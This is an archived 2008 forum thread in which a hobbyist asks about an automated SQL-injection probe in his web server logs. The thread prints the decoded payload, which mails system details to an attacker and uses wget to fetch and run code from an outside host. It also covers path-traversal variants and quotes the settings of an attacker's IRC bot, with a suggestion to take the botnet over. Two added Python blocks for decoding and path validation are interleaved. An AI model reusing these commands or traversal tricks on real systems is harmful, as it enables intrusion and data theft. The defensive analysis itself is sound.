• Welcome to Valhalla Legends Archive.
 

Is somone trying to hax0r my site?

Started by Ringo, February 06, 2008, 12:22 AM


Ringo

So, I wrote some little VB6 web server a while back to convert binary data to HTML pages for D2 players to view, but I noticed today I had the following requests, and am just wondering if anyone knows what they are trying to do? lol
Quote
[01:14:00] [Client 0] Querying: \cacti\cmd.php

[05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\
2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR
(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101,
116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109,
112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99,
97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46,
50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32,
47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32,
45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46,
47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111

[05:41:13] Connection From 69.42.162.18:18613
[05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log

What are they trying to do? hax it?

Sry if this is the wrong forum, just interested to know what they think they are going to accomplish.

edit: Just converted that mumbo jumbo chars to a string and got the following:

/sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out;
cat /tmp/out | mail -s XX.X.XX.XXX hacked [email protected];wget www.alexutz.as.ro/t -O /tmp/t;
chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log

Lol
Aside, XX.X.XX.XXX was my IP

[Kp edit: broke up the command line.  It broke the table.]
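The decoding Ringo did by hand can be scripted for log review. This is an added example, not code from the thread or from Ringo's server; the log line is constructed in the same shape as the request above, with a short made-up CHAR() payload. The `\**\` tokens are most likely `/**/` inline comments (whitespace substitutes) after the server's slash-to-backslash rewrite.

```python
import re

# Constructed log line in the shape of the request quoted above (made-up, short
# CHAR() payload; the real one from the post is not reproduced here).
SAMPLE_LINE = (
    "[05:40:40] [Client 0] Querying: \\cacti\\cmd.php?1+1111)\\**\\UNION\\**\\SELECT\\**\\"
    "2,0,1,CHAR(117,110,97,109,101,32,45,97),null,CHAR(47,116,109,112,47,111,117,116)"
    "\\**\\FROM\\**\\host\\*+11111"
)

# One CHAR(...) call: a comma-separated list of decimal code points, whitespace tolerated.
CHAR_CALL = re.compile(r"CHAR\(\s*([0-9][0-9,\s]*)\)", re.IGNORECASE)


def decode_char_call(arg_list: str) -> str:
    """Turn the decimal codes inside one CHAR(...) into text; non-printables become \\xNN."""
    codes = [int(c) for c in arg_list.replace(" ", "").split(",") if c]
    return "".join(chr(c) if 32 <= c < 127 else "\\x%02x" % c for c in codes)


def decode_char_calls(line: str) -> list:
    """Decoded text of every CHAR(...) call in a request line, in order of appearance."""
    return [decode_char_call(m.group(1)) for m in CHAR_CALL.finditer(line)]


def is_sql_injection_probe(line: str) -> bool:
    """Triage rule: UNION and SELECT keywords plus CHAR() obfuscation in one query string."""
    lowered = line.lower()
    return "union" in lowered and "select" in lowered and CHAR_CALL.search(line) is not None


def triage(line: str) -> dict:
    """Summarise one request log line for a human reviewer."""
    return {"suspicious": is_sql_injection_probe(line),
            "decoded_strings": decode_char_calls(line)}
```

Running `triage` over the sample line flags it and yields the two decoded strings, which is what a reviewer wants to see before deciding whether the request matched anything on the server.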

Barabajagal

You should send them an E-Mail telling them to try again, but this time do it right.

Ringo

lol
Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log?
I get the gist they were trying to get my server to email them on success, but I have almost no exp with web server software (hence I wrote my own), but surely it can't be that easy to hax a site?
All they got from me was "Page can not be found", heh

iago

That looks like a totally automated attack, unless you actually have "cmd.php".. probably somebody scanning random IP ranges.
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Ringo

Ah, cool, nothing to worry about then. (Nah, I don't have any PHP files, I don't know any PHP.)
They also tried it the day before, I think, because I forgot to add error handling for opening files, and my server crashed with the run time error "bad file number or name" :(
thx for info

Kp

I concur, that looks automated.  It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address.  It would then download additional code using wget and execute that.  That command line requires tools that are standard on Unix systems, but they're not standard on Windows.

The content of that suntzu.log would be whatever was printed by the Perl script.  Someone would have to download the script and examine it to find out what it prints.

As an aside, whoever wrote that wasn't very good.  There's no need to create so many temporary files.
[19:20:23] (BotNet) <[vL]Kp> Any idiot can make a bot with CSB, and many do!

Ringo

Ah  ::)
Too bad for them I guess, that sounds kinda lame  :'(
Thx for the info, at least I know what they were up to now :P
I'm gonna put some funny text for them in \cacti\cmd.php just in case they do it again.

mynameistmp

If you want to know more, I'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.
"This idea is so odd, it is hard to know where to begin in challenging it." - Martin Barker, British scholar

iago

Quote from: mynameistmp on February 06, 2008, 09:45 PM
If you want to know more, I'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.

You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor).


Newby

- Newby

Quote[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

Quote<TehUser> Man, I can't get Xorg to work properly.  This sucks.
<torque> you should probably kill yourself
<TehUser> I think I will.  Thanks, torque.

Ringo

Hm, I got another strange one today (seem to get this one a lot)

[09:04:11] Connection From 67.19.246.130:29261
[09:04:11] Item Drop Rate Pages Updated In 32ms
[09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg


[09:04:11] [Client 1] Connection Closed.

I'm guessing this one is automated as well, and is some kind of configuration file?
Would it be wise for me to IP-ban clients that request files from \cacti\ and \cgi-bin\?
I was a little worried one day someone will request \Project1.vbp :P (so I moved the source code)

Newby

Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worried one day someone will request \Project1.vbp :P (so I moved the source code)

I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy. :P

Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"

Ringo

Quote from: Newby on February 11, 2008, 03:58 PM
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worried one day someone will request \Project1.vbp :P (so I moved the source code)
Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
Haha, I just tried with iexplorer and got:
[22:11:38] [Client 0] Querying: \test.txt
Then tried it from a program I was using to open pages to view HTML with, and got:
[22:26:30] [Client 0] Querying: \..\test.txt
and in the requesting program:

[22:26:30] HTTP/1.1 200 OK
Date: Mon, 11 Feb 2008 22:26:30
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

OMFG this is a test
LOL


So, yeah, you could have back-pathed to that file :D
Not any more though. :)
I was wondering the other day if it's possible to back-path, wow lol.
Thanks for bringing that to my attention :P
Is there any other way to back-path like that?

iago

If you're removing ../, make sure you also pick up the unicode variations and malformed versions (i.e., does .%00./ work? Does ...///../// work? Does ..%ff/ work?)

There have been countless problems like that plaguing IIS over the years.


Ringo

ooch, thanks
Atm I'm just nerfing it like this:

    ' Normalise separators, then strip ".." and collapse doubled backslashes
    strFilePath = Replace(strFilePath, "/", "\")
    strFilePath = Replace(strFilePath, "..", "")
    strFilePath = Replace(strFilePath, "\\", "\")
    ' Never serve anything under the server's own directory
    If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    ' IsValidFile() strips invalid characters and checks the file can be opened
    ElseIf IsValidFile(strFilePath) = False Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    End If

IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one).
I'm guessing it would be a good idea, next time my CPU is idle, to brute force the Dir() function and log any successful back-pathing?
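The variants iago lists above and the substring-stripping in Ringo's snippet both point at the same lesson: decode once, normalise, then check that the resolved path is still inside the document root, rather than hunting for ".." spellings. This is an added example in Python, not code from the thread or from Ringo's VB6 server; the document root "/srv/d2html" and the sample requests are constructed placeholders.

```python
import posixpath
import unicodedata
from typing import Optional
from urllib.parse import unquote

# Assumed document root for the checks below (placeholder path, not from the thread).
WEB_ROOT = "/srv/d2html"


def resolve_request_path(raw_path: str, web_root: str = WEB_ROOT) -> Optional[str]:
    """Map a request path onto a file under web_root; None means refuse the request.

    Instead of stripping '..' substrings (a blacklist that misses odd spellings), this
    decodes the path exactly once, rejects bytes that never belong in a file name,
    normalises it, and then checks that the result is still contained in web_root.
    """
    decoded = unquote(raw_path)                        # %2e%2e -> .., %00 -> NUL, %ff -> U+FFFD
    if any(ord(ch) < 32 or ord(ch) == 127 for ch in decoded):
        return None                                    # NUL / control bytes, e.g. .%00./
    decoded = unicodedata.normalize("NFKC", decoded)   # fold full-width '.' and '/' look-alikes
    if any(ord(ch) > 127 for ch in decoded):
        return None                                    # only ASCII names are served (assumption)
    decoded = decoded.replace("\\", "/").lstrip("/")   # either separator counts; drop the leading one
    rel = posixpath.normpath(decoded)                  # collapses '.', '..' and repeated slashes
    if rel == ".." or rel.startswith("../"):
        return None                                    # still climbs above the root after normalising
    candidate = posixpath.normpath(posixpath.join(web_root, rel))
    if candidate != web_root and not candidate.startswith(web_root + "/"):
        return None                                    # belt and braces: final containment check
    return candidate


# Constructed request paths in the shapes discussed in the thread.
SAMPLE_REQUESTS = [
    "\\test.txt",
    "\\..\\test.txt",
    "\\..\\..\\..\\..\\..\\..\\WINDOWS\\explorer.exe",
    "/.%00./test.txt",
    "/...///..///test.txt",
    "/..%ff/test.txt",
    "/cacti/../index.html",
]


def audit(requests) -> dict:
    """Return {request: resolved path or None} so a log review shows which would escape."""
    return {r: resolve_request_path(r) for r in requests}
```

Note that a doubly-encoded name such as `%252e%252e` decodes once to the literal characters `%2e%2e`, which is simply a file name that does not exist; decoding in a loop until nothing changes is what reintroduces the traversal.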